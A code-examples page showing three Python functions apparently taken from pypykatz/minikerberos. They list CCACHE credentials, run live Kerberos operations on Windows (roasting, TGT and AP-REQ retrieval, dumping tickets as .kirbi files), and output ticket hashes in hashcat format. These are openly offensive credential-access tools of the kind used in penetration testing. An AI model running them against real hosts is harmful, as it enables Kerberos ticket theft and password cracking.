Пример #1
def list_ccache(ccachefile):
    """Print a table of the credentials stored in a CCACHE file.

    The file at *ccachefile* is parsed with ``CCACHE.from_file``. The first
    table row is ``'id'`` followed by ``Credential.summary_header()``; each
    later row is the zero-based position of a credential (as a string)
    followed by that credential's ``summary()``.
    """
    ccache = CCACHE.from_file(ccachefile)
    rows = [['id'] + Credential.summary_header()]
    for index, credential in enumerate(ccache.credentials):
        rows.append([str(index)] + credential.summary())
    # Blank line to separate the table from any earlier output.
    print()
    print_table(rows)
Пример #2
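	def run_live(self, args):
		"""Run one live Kerberos sub-command on the local Windows host.

		The sub-command is selected by ``args.live_kerberos_module``:

		* ``roast``       - run ``live_roast(args.out_file)``; results are
		  printed only when no output file was given.
		* ``tgt``         - fetch a TGT for ``args.target``; print it, or write
		  the raw ticket to ``args.out_file``.
		* ``apreq``       - fetch an AP-REQ and session key for ``args.target``
		  and print both base64 encoded.
		* ``currentluid`` - print the current LUID in hex.
		* ``purge``       - purge tickets, optionally limited to ``args.luid``.
		* ``sessions``    - delegate to ``KerberosLive.list_sessions``.
		* ``triage``      - print a table of ticket metadata for one LUID or
		  for all of them.
		* ``dump``        - export ticket data for one LUID or all of them,
		  either to stdout or as ``.kirbi`` files under ``args.outdir``.

		Returns ``None`` in every case. On non-Windows platforms a message is
		printed and nothing else happens.
		"""
		if platform.system() != 'Windows':
			print('[-]This command only works on Windows!')
			return

		# Imported only after the platform check above has passed.
		import os
		from pypykatz.kerberos.kerberoslive import KerberosLive, live_roast
		kl = KerberosLive()

		if args.live_kerberos_module == 'roast':
			# NOTE(review): `errors` is never reported here - confirm whether
			# per-ticket failures should be surfaced to the operator.
			res, errors, err = asyncio.run(live_roast(args.out_file))
			if err is not None:
				print('[LIVE][KERBEROS][ROAST] Error while roasting tickets! Reason: %s' % geterr(err))
				return
			if args.out_file is None:
				for r in res:
					print(r)

		elif args.live_kerberos_module == 'tgt':
			ticket = kl.get_tgt(args.target)
			if args.out_file is None:
				print_kirbi(ticket)
				return

			with open(args.out_file, 'wb') as f:
				f.write(ticket)

		elif args.live_kerberos_module == 'apreq':
			apreq, sessionkey = kl.get_apreq(args.target)
			print('APREQ b64: ')
			print(format_kirbi(apreq.dump()))
			print('Sessionkey b64: %s' % base64.b64encode(sessionkey).decode())

		elif args.live_kerberos_module == 'currentluid':
			print(hex(kl.get_current_luid()))

		elif args.live_kerberos_module == 'purge':
			luid = None
			if args.luid is not None:
				# Accept either a "0x"-prefixed hexadecimal LUID or a decimal one.
				if args.luid.startswith('0x'):
					luid = int(args.luid, 16)
				else:
					luid = int(args.luid)

			kl.purge(luid)
			print('Tickets purged!')

		elif args.live_kerberos_module == 'sessions':
			kl.list_sessions()

		elif args.live_kerberos_module == 'triage':
			if args.luid is None:
				ticketinfos = kl.get_all_ticketinfo()
			else:
				luid = KerberosCMDHelper.luid_converter(args.luid)
				ticketinfos = kl.get_ticketinfo(luid)

			table = [['LUID', 'ServerName', 'RealmName', 'StartTime', 'EndTime', 'RenewTime', 'EncryptionType', 'TicketFlags']]
			for luid in ticketinfos:
				for ticket in ticketinfos[luid]:
					table.append([
						hex(luid),
						ticket['ServerName'],
						ticket['RealmName'],
						filetime_to_dt(ticket['StartTime']).isoformat(),
						filetime_to_dt(ticket['EndTime']).isoformat(),
						filetime_to_dt(ticket['RenewTime']).isoformat(),
						str(ticket['EncryptionType']),
						str(ticket['TicketFlags'])
					])

			print_table(table)

		elif args.live_kerberos_module == 'dump':
			if args.luid is None:
				tickets = kl.export_all_ticketdata()
			else:
				luid = KerberosCMDHelper.luid_converter(args.luid)
				tickets = kl.export_ticketdata(luid)

			if args.outdir is not None:
				# Each ticket gets its own file, named after its LUID and its
				# position in that LUID's list. The earlier fixed name
				# 'ticket_a.kirbi' made every write overwrite the previous one,
				# and plain string concatenation dropped the path separator.
				# NOTE: .kirbi files are usable credential material; outdir
				# should be readable only by the operator.
				for luid in tickets:
					for idx, ticket in enumerate(tickets[luid]):
						filename = 'ticket_%s_%s.kirbi' % (hex(luid), idx)
						with open(os.path.join(args.outdir, filename), 'wb') as f:
							f.write(ticket['Ticket'])
			else:
				for luid in tickets:
					if len(tickets[luid]) == 0:
						continue

					print('LUID @%s' % hex(luid))
					for ticket in tickets[luid]:
						print_kirbi(ticket['Ticket'])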
Пример #3
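def main():
	"""Command-line entry point for listing, roasting and editing CCACHE files.

	Sub-commands:

	* ``list``  - print a table of all credentials with their zero-based ids.
	* ``roast`` - emit ticket hashes from ``CCACHE.get_hashes``, to stdout or
	  to ``--outfile`` (one hash per CRLF-terminated line).
	* ``del``   - write a copy of the cache without the credentials whose ids
	  were given with ``-i``. The copy goes to ``--outfile`` when supplied,
	  otherwise to ``<input name>.edited.ccache`` next to the input file.
	  The input file itself is never modified.
	"""
	import argparse

	parser = argparse.ArgumentParser(description='Tool to manipulate CCACHE files')
	subparsers = parser.add_subparsers(help = 'commands')
	subparsers.required = True
	subparsers.dest = 'command'

	roast_group = subparsers.add_parser('roast', help='Lists all tickets in hashcat-friendly format')
	roast_group.add_argument('-a', '--allhash', action='store_true', help='Process all tickets, regardless of enctype')
	roast_group.add_argument('-o', '--outfile', help='Output hash file name')

	list_group = subparsers.add_parser('list', help='List all tickets in the file')

	delete_group = subparsers.add_parser('del', help = 'Delete ticket(s) from file, store the new ccache file in a specified filename, or an automatically generated one')
	delete_group.add_argument('-o', '--outfile', help='Output ccache file name')
	delete_group.add_argument('-i','--id', type=int, action='append', help='Ticket ID to delete', required=True)
	parser.add_argument('ccachefile', help='input CCACHE file')
	args = parser.parse_args()

	logging.basicConfig(level=logging.INFO)
	logging.debug('Opening file %s', args.ccachefile)
	cc = CCACHE.from_file(args.ccachefile)

	if args.command == 'list':
		table = [['id'] + Credential.summary_header()]
		for i, cred in enumerate(cc.credentials):
			table.append([str(i)] + cred.summary())
		print()	# blank line before the table
		print_table(table)

	elif args.command == 'roast':
		if args.outfile:
			with open(args.outfile, 'wb') as f:
				for h in cc.get_hashes(all_hashes = args.allhash):
					f.write(h.encode() + b'\r\n')
		else:
			for h in cc.get_hashes(all_hashes = args.allhash):
				print(h)

	elif args.command == 'del':
		# Honour -o/--outfile. It was parsed but ignored before, so the
		# result always landed in the auto-generated file name.
		if args.outfile:
			output_filename = args.outfile
		else:
			output_filename = os.path.join(
				os.path.dirname(os.path.abspath(args.ccachefile)),
				'%s.edited.ccache' % ntpath.basename(args.ccachefile),
			)

		ids_to_delete = set(args.id)
		temp_cc = CCACHE()
		temp_cc.file_format_version = cc.file_format_version
		temp_cc.headers = cc.headers
		temp_cc.primary_principal = cc.primary_principal

		total = 0
		for i, cred in enumerate(cc.credentials):
			total = i + 1
			if i in ids_to_delete:
				continue
			temp_cc.credentials.append(cred)

		# An id that matches nothing would otherwise leave the ticket in the
		# output file with no indication that it was not removed.
		unknown_ids = sorted(x for x in ids_to_delete if x < 0 or x >= total)
		if unknown_ids:
			logging.warning('No ticket with id(s) %s in %s; nothing deleted for them', unknown_ids, args.ccachefile)

		logging.info('Writing edited file to %s', output_filename)
		temp_cc.to_file(output_filename)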